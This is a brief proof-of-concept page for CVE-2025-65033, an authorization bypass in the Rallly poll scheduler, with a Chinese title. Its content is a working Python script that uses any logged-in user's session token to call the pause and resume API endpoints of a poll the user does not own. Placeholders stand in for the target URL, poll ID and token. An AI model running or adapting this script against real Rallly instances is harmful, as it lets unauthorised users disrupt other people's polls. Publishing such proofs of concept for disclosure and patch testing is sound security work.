CVE-2025-65033 Rallly投票管理授权绕过漏洞

import requests # CVE-2025-65033 PoC - Rallly Authorization Bypass # Any authenticated user can pause/resume any poll TARGET_URL = "https://your-rallly-instance.com" POLL_ID = "target-poll-id-here" # Public poll ID from share link SESSION_TOKEN = "your-authenticated-session-token" headers = { "Authorization": f"Bearer {SESSION_TOKEN}", "Content-Type": "application/json" } # Pause any poll (regardless of ownership) pause_url = f"{TARGET_URL}/api/polls/{POLL_ID}/pause" response = requests.post(pause_url, headers=headers) print(f"Pause request status: {response.status_code}") print(f"Response: {response.text}") # Resume any poll (regardless of ownership) resume_url = f"{TARGET_URL}/api/polls/{POLL_ID}/resume" response = requests.post(resume_url, headers=headers) print(f"Resume request status: {response.status_code}") print(f"Response: {response.text}") # Note: No ownership verification is performed on the server side